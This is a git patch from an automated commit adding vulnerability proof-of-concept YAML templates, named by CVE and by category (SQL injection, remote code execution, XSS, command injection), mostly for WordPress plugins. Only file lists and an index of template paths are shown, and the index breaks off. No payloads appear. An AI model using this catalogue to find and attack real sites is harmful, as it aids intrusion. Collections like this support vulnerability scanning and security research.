From 89d61877c8974ec923985f0d8d224c8d4f349d0e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Nov 2024 12:43:37 +0000 Subject: [PATCH] 20241126 --- date.txt | 2 +- poc.txt | 122 +++++ ...ager-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ ...ckup-889122f13f92f4a43160426c13aa8df0.yaml | 59 ++ poc/cve/CVE-2011-1669-2046.yaml | 31 ++ poc/cve/CVE-2011-4624-2075.yaml | 29 + poc/cve/CVE-2013-3526-2254.yaml | 30 ++ poc/cve/CVE-2013-4625-2269.yaml | 30 ++ poc/cve/CVE-2014-4535-2349.yaml | 32 ++ poc/cve/CVE-2014-4592-2380.yaml | 37 ++ poc/cve/CVE-2014-5368-2398.yaml | 30 ++ poc/cve/CVE-2014-9094-2416.yaml | 29 + poc/cve/CVE-2015-9480-2629.yaml | 33 ++ poc/cve/CVE-2016-1000130-2660.yaml | 35 ++ poc/cve/CVE-2016-1000136-2686.yaml | 38 ++ poc/cve/CVE-2017-1000170-2838.yaml | 35 ++ poc/cve/CVE-2019-10692(1).yaml | 57 ++ poc/cve/CVE-2019-15713-3886.yaml | 32 ++ poc/cve/CVE-2020-24312-4805.yaml | 24 + poc/cve/CVE-2020-24312-4806.yaml | 37 ++ poc/cve/CVE-2020-35951-5106.yaml | 67 +++ poc/cve/CVE-2021-24495-5749.yaml | 40 ++ poc/cve/CVE-2021-24838-5768.yaml | 32 ++ poc/cve/CVE-2021-24947-5775.yaml | 41 ++ poc/cve/CVE-2021-24991-5779.yaml | 51 ++ poc/cve/CVE-2021-25074-5799.yaml | 28 + poc/cve/CVE-2021-39322-6337.yaml | 52 ++ poc/cve/CVE-2021-39350-6343.yaml | 54 ++ poc/cve/CVE-2022-0271-6617.yaml | 37 ++ poc/cve/CVE-2022-0288(1).yaml | 60 +++ ...2299-dc65b04d2202ad9c581e5d4523d9377b.yaml | 59 ++ ...2414-9f0d12c35523ff4f5d135545493c24b6.yaml | 59 ++ ...7297-a95d63f970ebd421a8709918222db375.yaml | 59 ++ ...0113-5e3997da307eb6c6a9470bf105039eed.yaml | 59 ++ ...0308-e95e71d9b22aad1a339e647728650987.yaml | 59 ++ ...0542-9cd3734bb0202544680880ac3ce86ba2.yaml | 59 ++ ...0570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml | 59 ++ ...0579-3b42e924fd20aca47fa65689d369e300.yaml | 59 ++ ...0632-ce98811461e8d024a9032e659d9f6dc9.yaml | 59 ++ ...0634-1cfffc62bc3024e3b58ab7adce57d49d.yaml | 59 ++ ...0677-17d70666036f25fcf74aa1320bac4cf3.yaml | 59 ++ ...0729-176c3f5bae8556ce3b12e234c357e170.yaml | 59 ++ ...0781-3c798af34f43aabb0c7903d65e6243ce.yaml | 59 ++ ...0813-148804687e2659312d74d49090ab4b03.yaml | 59 ++ ...0857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml | 59 ++ ...0868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml | 59 ++ ...1002-bb89910755dac308dc83c1e533f25239.yaml | 59 ++ ...1024-47f8599da025c3dd9d60a7fed198eb3e.yaml | 59 ++ ...1032-4ea7351ae274d6588df316b48df1d0e7.yaml | 59 ++ ...1091-f4e3a11a24e59ca5d94c2f2172581867.yaml | 59 ++ ...1119-91fb399971cf3dbe2eb559f4abe09be9.yaml | 59 ++ ...1192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml | 59 ++ ...1202-32578cc7038a4c251703cadebc084ad8.yaml | 59 ++ ...1202-52e2ce4340581c57296ec17159d2460d.yaml | 59 ++ ...1202-77caff140b8bc5be998ac80c9386051c.yaml | 59 ++ ...1202-7e66c6243adb4eea85c26f32e6f8ebab.yaml | 59 ++ ...1202-a3d50569bc623538b3b216d3f9a91b14.yaml | 59 ++ ...1202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml | 59 ++ ...1202-fff8c296c72f5db38be0e5405c2da320.yaml | 59 ++ ...1225-d04b85edb3b4b1503b77188d5240c512.yaml | 59 ++ ...1342-e05ffc71141aa17d097258d0a66a00da.yaml | 59 ++ ...1416-5d401293d5cdabfd1d6c6643186015bc.yaml | 59 ++ ...1418-fabf33e92d70128a9b53e9bacfb521c3.yaml | 59 ++ ...2137-9ccea012e0ac1d68360d1db53ebe0f41.yaml | 59 ++ ...8724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml | 59 ++ ...7638-e7353821f2fc91f455eddee79fe76776.yaml | 59 ++ ...7639-19456cd5cae51d9dbada09d8ad8ba38f.yaml | 59 ++ ...2377-892589d65d97802ea2d1e85ee0198106.yaml | 59 ++ ...8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml | 59 ++ ...8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml | 59 ++ ...9170-852e94b07d2d6cce1f47615e01c1a162.yaml | 59 ++ ...9307-99143edb3a824cd072b593997866abef.yaml | 59 ++ ...9461-4ff08177d4fa4134967742398a5fe2e9.yaml | 59 ++ ...9504-029455c801fdee249681893f5eb0c87b.yaml | 59 ++ ...9614-0ef94d7a238d24553757f1a16696672d.yaml | 59 ++ ...9988-287bf623a719e14be52f61193b77398b.yaml | 59 ++ poc/debug/aspx-debug-mode.yaml | 10 +- ...ader-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ poc/injection/Command Injection.yaml | 55 ++ .../geowebserver-lfi-xss.yaml | 50 ++ ...sser-05523ca99a6812ce9a8ee1b96d42e704.yaml | 59 ++ ...ewer-401534e15701284d7d10ed528a79ca69.yaml | 59 ++ ...ndar-b3cd350c4619e9b5bfb265fa7add2acb.yaml | 59 ++ ...tect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml | 59 ++ ...ntor-2c0ba7008797c295f2668278862f26f2.yaml | 59 ++ ...lery-2919c831aa5a75589b7d8a36cf988930.yaml | 59 ++ ...-kit-65f8ab2de6de83568fad8650a9c6403f.yaml | 59 ++ ...-kit-8661863ce6f4b8a6d1c36b185972e474.yaml | 59 ++ ...wall-7797f9e03c89bedae049ae2c17c746f0.yaml | 59 ++ ...tcha-f122a6109fde182691f204ad9efb3807.yaml | 59 ++ ...-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml | 59 ++ ...erce-871d7de019dc16d9e0194a95c1418987.yaml | 59 ++ ...erce-c39fb77f63e19b35a67746752819632d.yaml | 59 ++ ...king-4e73e0f016338be497c921cd08f860d0.yaml | 59 ++ ...pack-df377aa55171c3c6046688a216c80943.yaml | 59 ++ ...lace-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ ...osts-8f2dbde369351cc27693796adbcd9a58.yaml | 59 ++ ...7297-a95d63f970ebd421a8709918222db375.yaml | 59 ++ ...0570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml | 59 ++ ...1119-91fb399971cf3dbe2eb559f4abe09be9.yaml | 59 ++ ...1202-7e66c6243adb4eea85c26f32e6f8ebab.yaml | 59 ++ ...1202-fff8c296c72f5db38be0e5405c2da320.yaml | 59 ++ ...1225-d04b85edb3b4b1503b77188d5240c512.yaml | 59 ++ ...2137-9ccea012e0ac1d68360d1db53ebe0f41.yaml | 59 ++ ...7639-19456cd5cae51d9dbada09d8ad8ba38f.yaml | 59 ++ ...9307-99143edb3a824cd072b593997866abef.yaml | 59 ++ ...nded-3622d51c6b74dbf4cdd79a233382f3ca.yaml | 59 ++ ...tect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml | 59 ++ ...tory-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ ...list-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ ...ader-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ ...lace-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ ...ners-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ ...ager-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ ...sary-341142a6bceeaabdbeb709723a8564c9.yaml | 59 ++ poc/sql/error-sqli.yaml | 508 ++++++++++++++++++ ...-box-0f3bd1dbea65ea23a33e64d82488e169.yaml | 59 ++ ...-box-d698070b224b4726dbc297056bea4cbe.yaml | 59 ++ ...osts-8f2dbde369351cc27693796adbcd9a58.yaml | 59 ++ poc/sql_injection/error-sqli.yaml | 508 ++++++++++++++++++ poc/web/geowebserver-lfi-xss.yaml | 50 ++ ...ress-6157ddc840ff3aaacb724f29e67883ff.yaml | 59 ++ ...opup-be069733ca362578f99c68a45b934c7d.yaml | 59 ++ ...date-7b898c57c30032aff3f3e6faaf604680.yaml | 59 ++ poc/xss/geowebserver-lfi-xss.yaml | 50 ++ 125 files changed, 7663 insertions(+), 3 deletions(-) create mode 100644 poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml create mode 100644 poc/cve/CVE-2011-1669-2046.yaml create mode 100644 poc/cve/CVE-2011-4624-2075.yaml create mode 100644 poc/cve/CVE-2013-3526-2254.yaml create mode 100644 poc/cve/CVE-2013-4625-2269.yaml create mode 100644 poc/cve/CVE-2014-4535-2349.yaml create mode 100644 poc/cve/CVE-2014-4592-2380.yaml create mode 100644 poc/cve/CVE-2014-5368-2398.yaml create mode 100644 poc/cve/CVE-2014-9094-2416.yaml create mode 100644 poc/cve/CVE-2015-9480-2629.yaml create mode 100644 poc/cve/CVE-2016-1000130-2660.yaml create mode 100644 poc/cve/CVE-2016-1000136-2686.yaml create mode 100644 poc/cve/CVE-2017-1000170-2838.yaml create mode 100644 poc/cve/CVE-2019-10692(1).yaml create mode 100644 poc/cve/CVE-2019-15713-3886.yaml create mode 100644 poc/cve/CVE-2020-24312-4805.yaml create mode 100644 poc/cve/CVE-2020-24312-4806.yaml create mode 100644 poc/cve/CVE-2020-35951-5106.yaml create mode 100644 poc/cve/CVE-2021-24495-5749.yaml create mode 100644 poc/cve/CVE-2021-24838-5768.yaml create mode 100644 poc/cve/CVE-2021-24947-5775.yaml create mode 100644 poc/cve/CVE-2021-24991-5779.yaml create mode 100644 poc/cve/CVE-2021-25074-5799.yaml create mode 100644 poc/cve/CVE-2021-39322-6337.yaml create mode 100644 poc/cve/CVE-2021-39350-6343.yaml create mode 100644 poc/cve/CVE-2022-0271-6617.yaml create mode 100644 poc/cve/CVE-2022-0288(1).yaml create mode 100644 poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml create mode 100644 poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml create mode 100644 poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml create mode 100644 poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml create mode 100644 poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml create mode 100644 poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml create mode 100644 poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml create mode 100644 poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml create mode 100644 poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml create mode 100644 poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml create mode 100644 poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml create mode 100644 poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml create mode 100644 poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml create mode 100644 poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml create mode 100644 poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml create mode 100644 poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml create mode 100644 poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml create mode 100644 poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml create mode 100644 poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml create mode 100644 poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml create mode 100644 poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml create mode 100644 poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml create mode 100644 poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml create mode 100644 poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml create mode 100644 poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml create mode 100644 poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml create mode 100644 poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml create mode 100644 poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml create mode 100644 poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml create mode 100644 poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml create mode 100644 poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml create mode 100644 poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml create mode 100644 poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml create mode 100644 poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml create mode 100644 poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml create mode 100644 poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml create mode 100644 poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml create mode 100644 poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml create mode 100644 poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml create mode 100644 poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml create mode 100644 poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml create mode 100644 poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml create mode 100644 poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml create mode 100644 poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml create mode 100644 poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml create mode 100644 poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml create mode 100644 poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/injection/Command Injection.yaml create mode 100644 poc/local_file_inclusion/geowebserver-lfi-xss.yaml create mode 100644 poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml create mode 100644 poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml create mode 100644 poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml create mode 100644 poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml create mode 100644 poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml create mode 100644 poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml create mode 100644 poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml create mode 100644 poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml create mode 100644 poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml create mode 100644 poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml create mode 100644 poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml create mode 100644 poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml create mode 100644 poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml create mode 100644 poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml create mode 100644 poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml create mode 100644 poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml create mode 100644 poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml create mode 100644 poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml create mode 100644 poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml create mode 100644 poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml create mode 100644 poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml create mode 100644 poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml create mode 100644 poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml create mode 100644 poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml create mode 100644 poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml create mode 100644 poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml create mode 100644 poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml create mode 100644 poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml create mode 100644 poc/sql/error-sqli.yaml create mode 100644 poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml create mode 100644 poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml create mode 100644 poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml create mode 100644 poc/sql_injection/error-sqli.yaml create mode 100644 poc/web/geowebserver-lfi-xss.yaml create mode 100644 poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml create mode 100644 poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml create mode 100644 poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml create mode 100644 poc/xss/geowebserver-lfi-xss.yaml diff --git a/date.txt b/date.txt index 19047096d8..866e998b5b 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241125 +20241126 diff --git a/poc.txt b/poc.txt index 5bb1b30042..867624d13f 100644 --- a/poc.txt +++ b/poc.txt @@ -2484,6 +2484,7 @@ ./poc/auth/cloudinary-credentials.yaml ./poc/auth/cloudpanel-login.yaml ./poc/auth/cloudstack-default-login.yaml +./poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/auth/cm-video-lesson-manager-adc03f41b1a0fc94bb66a5f89513eead.yaml ./poc/auth/cm-video-lesson-manager-pro-adc03f41b1a0fc94bb66a5f89513eead.yaml ./poc/auth/cm-video-lesson-manager-pro.yaml @@ -6814,6 +6815,7 @@ ./poc/backup/blogvault-real-time-backup-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/backup/blogvault-real-time-backup-plugin.yaml ./poc/backup/blogvault-real-time-backup.yaml +./poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml ./poc/backup/boldgrid-backup-af02285370806db39f139e5eeb2109cf.yaml ./poc/backup/boldgrid-backup-f80b64f3e7a1b521248cad7f30f78f43.yaml ./poc/backup/boldgrid-backup.yaml @@ -8831,6 +8833,7 @@ ./poc/cve/CVE-2011-1047-d96be18375773588f0f483d4ada57922.yaml ./poc/cve/CVE-2011-1047.yaml ./poc/cve/CVE-2011-1669-2044.yaml +./poc/cve/CVE-2011-1669-2046.yaml ./poc/cve/CVE-2011-1669-a55226715cbfa8fc4e25477ef2abaef0.yaml ./poc/cve/CVE-2011-1669.yaml ./poc/cve/CVE-2011-1762-b98fb14bc0b549d4abcc53b29b712fd3.yaml @@ -8905,6 +8908,7 @@ ./poc/cve/CVE-2011-4595.yaml ./poc/cve/CVE-2011-4618-391f474e06835c68dec4fb58e933aba3.yaml ./poc/cve/CVE-2011-4618.yaml +./poc/cve/CVE-2011-4624-2075.yaml ./poc/cve/CVE-2011-4624-deb27e459bccc6c567e77bedadf302ef.yaml ./poc/cve/CVE-2011-4624.yaml ./poc/cve/CVE-2011-4640.yaml @@ -9492,6 +9496,7 @@ ./poc/cve/CVE-2013-3491-0c168f79b44c00adde765867b84cd13b.yaml ./poc/cve/CVE-2013-3491.yaml ./poc/cve/CVE-2013-3526-2250.yaml +./poc/cve/CVE-2013-3526-2254.yaml ./poc/cve/CVE-2013-3526-2255.yaml ./poc/cve/CVE-2013-3526-a266c3247c63a001c07720468657c7b0.yaml ./poc/cve/CVE-2013-3526.yaml @@ -9532,6 +9537,7 @@ ./poc/cve/CVE-2013-4454.yaml ./poc/cve/CVE-2013-4462-16944fdd8879fb55f44fca776684e221.yaml ./poc/cve/CVE-2013-4462.yaml +./poc/cve/CVE-2013-4625-2269.yaml ./poc/cve/CVE-2013-4625-2271.yaml ./poc/cve/CVE-2013-4625-c8066fe352a3efc9f6d6df879bae901c.yaml ./poc/cve/CVE-2013-4625.yaml @@ -9915,6 +9921,7 @@ ./poc/cve/CVE-2014-4534-bf7fdb7ab58e0901f00e8d60dcb2e1d4.yaml ./poc/cve/CVE-2014-4534.yaml ./poc/cve/CVE-2014-4535-2347.yaml +./poc/cve/CVE-2014-4535-2349.yaml ./poc/cve/CVE-2014-4535-3d01778e50ed2091df8f42d1d6714632.yaml ./poc/cve/CVE-2014-4535.yaml ./poc/cve/CVE-2014-4536-2350.yaml @@ -10037,6 +10044,7 @@ ./poc/cve/CVE-2014-4591-2f915f477d37b349867bc04aeb12d553.yaml ./poc/cve/CVE-2014-4591.yaml ./poc/cve/CVE-2014-4592-2376.yaml +./poc/cve/CVE-2014-4592-2380.yaml ./poc/cve/CVE-2014-4592-63d6be807d589fe05a43c1a154984e97.yaml ./poc/cve/CVE-2014-4592.yaml ./poc/cve/CVE-2014-4593-523766ae916645b68a060d3e8a3d2540.yaml @@ -10180,6 +10188,7 @@ ./poc/cve/CVE-2014-5347-13a438ed5cf2f34b9897196a8c29f2f9.yaml ./poc/cve/CVE-2014-5347.yaml ./poc/cve/CVE-2014-5368-2397.yaml +./poc/cve/CVE-2014-5368-2398.yaml ./poc/cve/CVE-2014-5368-93bf6dbe410010e503c60f7e20f4acea.yaml ./poc/cve/CVE-2014-5368.yaml ./poc/cve/CVE-2014-5389-88780eb9a8b6e52598bcc4ed44a164c3.yaml @@ -10353,6 +10362,7 @@ ./poc/cve/CVE-2014-9038.yaml ./poc/cve/CVE-2014-9039-e36ead55dcc8029f1208afc5fd967940.yaml ./poc/cve/CVE-2014-9039.yaml +./poc/cve/CVE-2014-9094-2416.yaml ./poc/cve/CVE-2014-9094-2420.yaml ./poc/cve/CVE-2014-9094-33981699600bd7688fa76839ea64eb69.yaml ./poc/cve/CVE-2014-9094.yaml @@ -11412,6 +11422,7 @@ ./poc/cve/CVE-2015-9477.yaml ./poc/cve/CVE-2015-9479-610c1b0820a34b426f46a24294b86cf7.yaml ./poc/cve/CVE-2015-9479.yaml +./poc/cve/CVE-2015-9480-2629.yaml ./poc/cve/CVE-2015-9480-2630.yaml ./poc/cve/CVE-2015-9480-2632.yaml ./poc/cve/CVE-2015-9480-2633.yaml @@ -11563,6 +11574,7 @@ ./poc/cve/CVE-2016-1000129-b5d1789ed0ade3c2f34db64ead649719.yaml ./poc/cve/CVE-2016-1000129.yaml ./poc/cve/CVE-2016-1000130-2659.yaml +./poc/cve/CVE-2016-1000130-2660.yaml ./poc/cve/CVE-2016-1000130-d953a1566c86af7c691d8c877f8e9d37.yaml ./poc/cve/CVE-2016-1000130.yaml ./poc/cve/CVE-2016-1000131-2661.yaml @@ -11582,6 +11594,7 @@ ./poc/cve/CVE-2016-1000135-2685.yaml ./poc/cve/CVE-2016-1000135-953ff551adbc4893b237af8ca2f3090a.yaml ./poc/cve/CVE-2016-1000135.yaml +./poc/cve/CVE-2016-1000136-2686.yaml ./poc/cve/CVE-2016-1000136-743a0575c2e9f5674d434b647e0829cf.yaml ./poc/cve/CVE-2016-1000136.yaml ./poc/cve/CVE-2016-1000137-2690.yaml @@ -12062,6 +12075,7 @@ ./poc/cve/CVE-2017-1000038-bf988e0d814700ec44f119b226466a0c.yaml ./poc/cve/CVE-2017-1000038.yaml ./poc/cve/CVE-2017-1000163.yaml +./poc/cve/CVE-2017-1000170-2838.yaml ./poc/cve/CVE-2017-1000170-2840.yaml ./poc/cve/CVE-2017-1000170-2f1afbe99f3a4b3fbcd2086e71fd1ce6.yaml ./poc/cve/CVE-2017-1000170-8184254cd86a1fe25bafab70f7a81e9d.yaml @@ -13737,6 +13751,7 @@ ./poc/cve/CVE-2019-10475.yaml ./poc/cve/CVE-2019-10673-2ea518f353dd95f0f661c47162793419.yaml ./poc/cve/CVE-2019-10673.yaml +./poc/cve/CVE-2019-10692(1).yaml ./poc/cve/CVE-2019-10692-bc8f794cdcc46e9ceffda0a7252e56e7.yaml ./poc/cve/CVE-2019-10692.yaml ./poc/cve/CVE-2019-10717.yaml @@ -14060,6 +14075,7 @@ ./poc/cve/CVE-2019-15660-788c94bddb7d067a26cd25572d441b43.yaml ./poc/cve/CVE-2019-15660.yaml ./poc/cve/CVE-2019-15713-3884.yaml +./poc/cve/CVE-2019-15713-3886.yaml ./poc/cve/CVE-2019-15713-3887.yaml ./poc/cve/CVE-2019-15713-681f882789fbd8efc46c58acadc76ffa.yaml ./poc/cve/CVE-2019-15713.yaml @@ -15145,6 +15161,8 @@ ./poc/cve/CVE-2020-24223 2.yaml ./poc/cve/CVE-2020-24223.yaml ./poc/cve/CVE-2020-24312 2.yaml +./poc/cve/CVE-2020-24312-4805.yaml +./poc/cve/CVE-2020-24312-4806.yaml ./poc/cve/CVE-2020-24312-694d378ae813237a53116c0909956f7b.yaml ./poc/cve/CVE-2020-24312.yaml ./poc/cve/CVE-2020-24313-48b0049e9e24d640a7ebc6488377fcfd.yaml @@ -15397,6 +15415,7 @@ ./poc/cve/CVE-2020-35949.yaml ./poc/cve/CVE-2020-35950-7bb0d7c21500bcf5a194c658d80a052e.yaml ./poc/cve/CVE-2020-35950.yaml +./poc/cve/CVE-2020-35951-5106.yaml ./poc/cve/CVE-2020-35951-725c3bbeb5f948e2eae27fab9455cfc4.yaml ./poc/cve/CVE-2020-35951.yaml ./poc/cve/CVE-2020-35984.yaml @@ -16805,6 +16824,7 @@ ./poc/cve/CVE-2021-24495-1.yaml ./poc/cve/CVE-2021-24495-2.yaml ./poc/cve/CVE-2021-24495-5748.yaml +./poc/cve/CVE-2021-24495-5749.yaml ./poc/cve/CVE-2021-24495-f9cf0d0ce26a12b4d4e222f02f196b48.yaml ./poc/cve/CVE-2021-24495.yaml ./poc/cve/CVE-2021-24496-1e49e561c1334988a3c1e2d22a931336.yaml @@ -17491,6 +17511,7 @@ ./poc/cve/CVE-2021-24837-856b5478246812988fad7c31a72f34f6.yaml ./poc/cve/CVE-2021-24837.yaml ./poc/cve/CVE-2021-24838-193631008f48769f14ce31f773b10581.yaml +./poc/cve/CVE-2021-24838-5768.yaml ./poc/cve/CVE-2021-24838.yaml ./poc/cve/CVE-2021-24839-b54cf1fedbcdd93956474a85392276cb.yaml ./poc/cve/CVE-2021-24839.yaml @@ -17704,6 +17725,7 @@ ./poc/cve/CVE-2021-24945.yaml ./poc/cve/CVE-2021-24946-fc7a22b1f1e6a64f9cbfb21dc5918e58.yaml ./poc/cve/CVE-2021-24946.yaml +./poc/cve/CVE-2021-24947-5775.yaml ./poc/cve/CVE-2021-24947-a38442c74b4b964e9891c33a3c89d86f.yaml ./poc/cve/CVE-2021-24947.yaml ./poc/cve/CVE-2021-24948-43cb73e5880c458fecdd0d8735e9478d.yaml @@ -17792,6 +17814,7 @@ ./poc/cve/CVE-2021-24988.yaml ./poc/cve/CVE-2021-24989-54d4bf1ec219885cd28ee93225984da9.yaml ./poc/cve/CVE-2021-24989.yaml +./poc/cve/CVE-2021-24991-5779.yaml ./poc/cve/CVE-2021-24991-f92a9bd46674029d28cfefafb78ac462.yaml ./poc/cve/CVE-2021-24991.yaml ./poc/cve/CVE-2021-24992-59cf47e7730d869086870b83f48369ca.yaml @@ -17966,6 +17989,7 @@ ./poc/cve/CVE-2021-25073-aad64539b565759033143a8a3c3bdec0.yaml ./poc/cve/CVE-2021-25073.yaml ./poc/cve/CVE-2021-25074-1dd9748abeee230ec3d16e0e8aaee689.yaml +./poc/cve/CVE-2021-25074-5799.yaml ./poc/cve/CVE-2021-25074.yaml ./poc/cve/CVE-2021-25075(1).yaml ./poc/cve/CVE-2021-25075-1fd981b13fad947916f8c39fc983ff41.yaml @@ -18719,6 +18743,7 @@ 